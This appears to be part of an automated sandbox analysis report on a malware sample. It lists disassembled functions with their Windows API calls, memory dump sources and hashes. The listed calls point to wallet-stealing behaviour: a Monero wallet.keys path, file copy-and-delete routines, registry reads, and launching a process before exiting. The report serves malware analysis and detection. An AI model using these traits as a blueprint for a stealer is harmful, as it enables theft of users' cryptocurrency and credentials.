                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                          • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                          • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                          • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                          Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004012B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 004012BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004012F5
                          • RegCloseKey.ADVAPI32(?), ref: 004012FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                          • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                          • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                          • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                          Function 0041C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 0c12102a7cdd154f262930b871950fa552e11606a6e28a0f60d8dffc08638287
                          • Instruction ID: 8b2bdcace91feebb35a4b118135bf4cb05f7e48c81c90e72df72044ccdfa8b16
                          • Opcode Fuzzy Hash: 0c12102a7cdd154f262930b871950fa552e11606a6e28a0f60d8dffc08638287
                          • Instruction Fuzzy Hash: B94127B154079C5EDB218B24CDC4FFB7BF89F05308F1444EEE98A86182D2759A85CF68
                          Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                          • ExitProcess.KERNEL32 ref: 00416755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                          • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                          • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                          • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                          Function 004187C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00418836
                          • wsprintfA.USER32 ref: 00418850
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                          • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                          • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                          • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                          Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00418D62
                          • wsprintfW.USER32 ref: 00418D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                          • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                          • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                          • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                          Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(00420E1A,012899C8,004205AE,?,?,004013F9,?,0000001A,00420E1A,00000000,?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 00418B86
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0040A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0040A6BC
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                          • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                          • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                          • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                          Function 0040D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(00420E1A,012899C8,004205AE,?,?,004013F9,?,0000001A,00420E1A,00000000,?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 00418B86
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                          • lstrlen.KERNEL32(00000000), ref: 0040D698
                          • lstrlen.KERNEL32(00000000), ref: 0040D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                          • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                          • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                          • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                          Function 0040D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(00420E1A,012899C8,004205AE,?,?,004013F9,?,0000001A,00420E1A,00000000,?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 00418B86
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                          • lstrlen.KERNEL32(00000000), ref: 0040D99F
                          • lstrlen.KERNEL32(00000000), ref: 0040D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                          • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                          • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                          • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                          Function 004170D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                          Download Yara Rule
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                          • sA, xrefs: 00417111
                          • sA, xrefs: 004172AE, 00417179, 0041717C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 3722407311-2614523144
                          • Opcode ID: e8a1614ae27c0826006aff9a976613fec449a8654b29928f6117e4c6c67b7198
                          • Instruction ID: 129a870a3a59fbd97e4d02dfab19d553d00e22c10235de59886d0c6bfd7e61ef
                          • Opcode Fuzzy Hash: e8a1614ae27c0826006aff9a976613fec449a8654b29928f6117e4c6c67b7198
                          • Instruction Fuzzy Hash: 3F5194B0D44218ABDB24EB90DC45BEEB374AF44304F1040AEE51576281DB786EC9CF5D
                          Function 00413560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
